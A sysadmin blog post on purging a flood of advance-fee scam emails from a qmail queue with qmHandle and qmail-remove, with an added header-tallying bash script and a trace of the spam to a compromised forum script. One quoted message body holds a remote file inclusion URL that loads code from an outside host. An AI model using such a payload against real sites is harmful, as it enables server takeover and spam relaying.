This morning I checked my queue and found 32355 emails on my qmail server. That is an abnormal count.
Managing a qmail queue is easy with third-party tools, for example qmHandle and qmail-remove. Install both of them on your machine. For your info, qmHandle can now remove email from the queue based on a criterion or with multiple delete requests. But for me, it is not as powerful as qmail-remove.
It's hard to find out who the spammer is on a server which does not run PHP suEXEC, because all email from webmail and from clients' websites is marked with the uid of apache, which on my server is uid 48.

[root@serverku root]# qmHandle -s
Messages in local queue: 0
Messages in remote queue: 32355

[root@serverku root]# qmHandle -l -c | more
1143721 (0, R)
Return-path:
From: [email protected]
To: [email protected]
Subject: failure notice
Date: 23 Nov 2007 11:18:30 +0700
Size: 1472 bytes

1143974 (0, R)
Return-path: [email protected]
From: TELEX/ WIRE TRANSFER DEPT CBN.
To: [email protected]
Subject: LONG AWAITED CONTRACT / INHERITANCE PAYMENT.
Date: 23 Nov 2007 11:26:00 +0700
Size: 2103 bytes

1143997 (0, R)
Return-path: [email protected]
From: TELEX/ WIRE TRANSFER DEPT CBN.
To: [email protected]
Subject: LONG AWAITED CONTRACT / INHERITANCE PAYMENT.
Date: 23 Nov 2007 11:26:01 +0700
Size: 2110 bytes

1144112 (0, R)
Return-path: [email protected]
From: TELEX/ WIRE TRANSFER DEPT CBN.
To: [email protected]
Subject: LONG AWAITED CONTRACT / INHERITANCE PAYMENT.
Date: 23 Nov 2007 11:26:05 +0700
Size: 2108 bytes

1144296 (0, R)
Return-path: [email protected]
From: ROBERT MONTE ESQ.
To: [email protected]
Subject: NEXT OF KIN CLAIM S.
Date: 23 Nov 2007 11:26:13 +0700
Size: 2259 bytes

…etc..

From the queue list we can see that a lot of emails have the same subject or sender. For mine it is “Subject: LONG AWAITED CONTRACT / INHERITANCE PAYMENT”. Use this as the keyword to remove that spam:

[root@serverku root]# qmail-remove -r -p LONG AWAITED CONTRACT
1261513: no
1261559: no
1261697: yes
moved mess/9/1261697 to yanked/1261697.mess
moved intd/9/1261697 to yanked/1261697.intd
moved todo/9/1261697 to yanked/1261697.todo
1261743: yes
moved mess/9/1261743 to yanked/1261743.mess
moved intd/9/1261743 to yanked/1261743.intd
moved todo/9/1261743 to yanked/1261743.todo
1261835: yes
moved mess/9/1261835 to yanked/1261835.mess
moved intd/9/1261835 to yanked/1261835.intd
moved todo/9/1261835 to yanked/1261835.todo
1255418: yes
moved mess/9/1255418 to yanked/1255418.mess
moved intd/9/1255418 to yanked/1255418.intd
moved todo/9/1255418 to yanked/1255418.todo
1261996: yes
moved mess/9/1261996 to yanked/1261996.mess
moved intd/9/1261996 to yanked/1261996.intd
moved todo/9/1261996 to yanked/1261996.todo
1262065: no
1262088: yes
moved mess/9/1262088 to yanked/1262088.mess
moved intd/9/1262088 to yanked/1262088.intd
moved todo/9/1262088 to yanked/1262088.todo
1262111: yes
moved mess/9/1262111 to yanked/1262111.mess
moved intd/9/1262111 to yanked/1262111.intd
moved todo/9/1262111 to yanked/1262111.todo
1262134: yes
moved mess/9/1262134 to yanked/1262134.mess
moved intd/9/1262134 to yanked/1262134.intd
moved todo/9/1262134 to yanked/1262134.todo
1262157: yes
moved mess/9/1262157 to yanked/1262157.mess
moved intd/9/1262157 to yanked/1262157.intd
moved todo/9/1262157 to yanked/1262157.todo
28650 file(s) match
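
To pick the keyword without paging through thousands of entries, the listing can be tallied by header value. The script below is an added example, not part of the original post: the `top_field` helper name is hypothetical and the sample listing is constructed with placeholder addresses.

```bash
#!/bin/bash
# Added example (not from the original post): rank header values in a
# queue listing so the dominant spam subject or sender stands out.

# Constructed sample in the layout of the `qmHandle -l` output above.
# All addresses are placeholders.
sample_listing() {
cat <<'EOF'
1143721 (0, R)
Return-path:
Subject: failure notice

1143974 (0, R)
Return-path: apache@web.example.invalid
Subject: LONG AWAITED CONTRACT / INHERITANCE PAYMENT.

1143997 (0, R)
Return-path: apache@web.example.invalid
Subject: LONG AWAITED CONTRACT / INHERITANCE PAYMENT.

1144112 (0, R)
Return-path: apache@web.example.invalid
Subject: LONG AWAITED CONTRACT / INHERITANCE PAYMENT.

1144296 (0, R)
Return-path: apache@web.example.invalid
Subject: NEXT OF KIN CLAIM S.
EOF
}

# top_field FIELD [N]  (hypothetical helper name)
# Reads a listing on stdin and prints "count<TAB>value" for the N most
# frequent values of FIELD (default 10). An empty value, as on the
# Return-path line of a bounce, is reported as "(empty)".
top_field() {
    awk -v f="$1" '
        BEGIN { pat = "^[ \t]*" f ":[ \t]*" }
        $0 ~ pat {
            sub(pat, "")
            sub(/[ \t\r]+$/, "")
            count[$0 == "" ? "(empty)" : $0]++
        }
        END { for (v in count) printf "%d\t%s\n", count[v], v }
    ' | sort -t "$(printf '\t')" -k1,1nr -k2,2 | head -n "${2:-10}"
}

# Offline demo on the constructed sample; on a live server pipe in
# the output of `qmHandle -l` instead.
sample_listing | top_field Subject 3
```

The value at the top of the list is the candidate pattern for `qmail-remove -p`; running the same tally on `Return-path` shows whether the bulk of the queue shares one envelope sender.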

Now we have 28650 emails moved from the queue into yanked. Repeat that step until your email queue is under 100. The next step is to read some of the remaining emails at random, carefully, especially those with a weird subject, sender, recipient or return path:

[root@serverku root]# qmHandle -m1143745 | more

————–
MESSAGE NUMBER 1143745
————–
Received: (qmail 2327 invoked by uid 48); 23 Nov 2007 11:21:09 +0700
Date: 23 Nov 2007 11:21:09 +0700
Message-ID: <[email protected]>
To: [email protected]
Subject: /forum/impex/ImpExData.php
MIME-Version: 1.0
From: /forum/impex/ImpExData.php
Reply-To: [email protected]

————–thedemon—————
:: Inbox: www.website.web.id .
/forum/impex/ImpExData.php?systempath=http://mtdg.xpg.com.br/pnx.txt?
————–thedemon—————

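That's the spammer: the message was injected by uid 48 (apache), and its body names www.website.web.id together with the /forum/impex/ImpExData.php script. Suspend the site and tell them about this.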
